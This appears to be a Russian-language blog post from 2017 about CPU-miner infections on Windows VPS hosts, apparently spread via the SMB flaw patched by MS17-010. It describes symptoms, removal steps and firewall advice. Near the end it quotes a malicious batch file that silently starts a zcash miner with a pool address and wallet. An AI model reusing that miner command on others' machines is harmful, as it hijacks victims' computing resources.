Эпидемия CPU Miner на Windows VPS

26 Apr 2017 | Автор: anchous |

Утром упало инфо.письмо от одного из хостеров о том, что у него на хостинге началась эпидемия виндовых машин, которые заражаются CPU майнером. Причем само сообщение носило характер зомби апокалипсиса “При этом наличие фаервола и сложные пароли никак не спасают” “Через эту дыру начали массово пихать на машины что попало” и ты.ды

Поскольку я с проблемой нигде не столкнулся, за что отдельное спасибо Comodo IS и Eset SS, то привожу инфу со слов представителя хостинга.

Основные симптомы того, что вам присадили на вашу винду CPU Miner:

  1. Машина дико тупит и тормозит, но при этом при вызове диспетчера задач (WIN + R -> taskmgr) нагрузка на проц падает, т.к CPU Miner выгружается из памяти;
  2. На машине присутствует папка вида: C:\Windows\winsxslog (на стандартной системе есть только системная директория winsxs);
  3. В сервисах имеется служба без описания с именем из случайного набора букв, например DHSWIQU (для каждой системы генерится случайным образом)

Лечение этой пакости идет следующим образом:

  1. Запускаем диспетчер задач, тем самым выгружая майнер;
  2. В диспетчере сервисов меняем тип запуска найденного абракадабрового сервиса с Автоматический на Отключено;
  3. Пробуем остановить его руками, но вероятнее всего не получится;
  4. Меняем реквизиты доступа на папку C:\Windows\winsxslog запрещая полный доступ в неё;
  5. Перегружаем машину

Теоретически можно перезагрузить в безопасном режиме, если есть KVM к виртуалке, и сносим все руками.

Теперь собственно о том, что это такое и как с этим жить.

Как я понимаю, это все поcледствие публикации пакета эксплоитов от хакерской тимы The Shadow Brokers, которые уперли у, связанной с АНБ, хакерской группировкой   Equation Group полезный инструментарий и теперь публикуют его частями.

В середине апреля они выложили в паблики архив с эксплоитами для всей виндусовой линейки NT, 2000, 2003, 2008 и до 2012, а также для домашних версий XP, Vista, 7 и Windows 8.

Беглый просмотр описаний использовавшихся уязвимостей не вызвал особого восторга, т.к все они представляют собой древние, как говно мамонта, дырки. Но сообщество было взволновано и мелкомягкие срочно отписались, что дырки были прикрыты ранее, пакетами обновлений: MS17-010, MS10-061, MS09-050, MS08-067, большая часть из которых была включена в сервис паки, кроме обновления MS17-010 выпущенного в середине марта для систем старше Windows Vista.

Данное обновление прикрывает уязвимость SMB (Microsoft Server Message Block) при которой злоумышленник вгружает в открытый 445 порт произвольный код, запуская его дистанционно на машине. Откровенно говоря, я не очень понимаю, кто эти люди, что в 21 веке выставляют виндовую машину в инет, не прикрыв стандартные порты локалки, поскольку эпопея нагибания винды через 445 порт началась где то в 2001-2002 годах всем многообразием сетевых червей: сассер, делоадер, майтоб.

Так что первым шагом, после установки винды и Firefox для нормальной работы, следовала установка програмных IPS и фаервола из вышеупомянутых программных линеек: Comodo Internet Security и Eset Smart Security. Программные продукты IPS более надежны чем патчи от мелкомягких, т.к прикрывают возможные уязвимости исходя из анормальной активности, а не сигнатурной базы, т.ч могу перекрывать подобные 0-day уязвимости, а не только известные миру дырки.

Ну и банальный фаервол, где закрываются все порты (в случае штатного фаервола это можно прописать руками на интерфейсе), кроме стандартных 80, 8080, 443, 53, 20-22, 110, 25. Можно в принципе идти от обратного, закрывая все уязвимые виндовые порты 113, 135-139, 445, но лучше все же до 1024 порта открывать только стандартные порты использующиеся веб-сервисами.

З.Ы сегодня на серче нашли еще один вариант – директорию C:\wwwskype\ содержащую файлы
nheqminer.exe
wwwskype.bat
wwwskype.js
*.dll

при этом джсник вызывает из себя wwwskype.bat следующего содержания
cd C:\wwwskype\
start /b /LOW nheqminer.exe -l eu1-zcash.flypool.org:3333 -u t1J1BCXT5mg4VmammNkLv4SH5dcwemGfxAS.rig0117 -t -1

при проверке ESET видит файл nheqminer.exe как зловред Win64/BitCoinMiner.BW, камода и доктор веб пока не видят ничего. Я конечно не намекаю ни на что, но отчет сам по себе показателен.

VN:F [1.9.21_1169]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.21_1169]
Rating: 0 (from 0 votes)

Ваш отзыв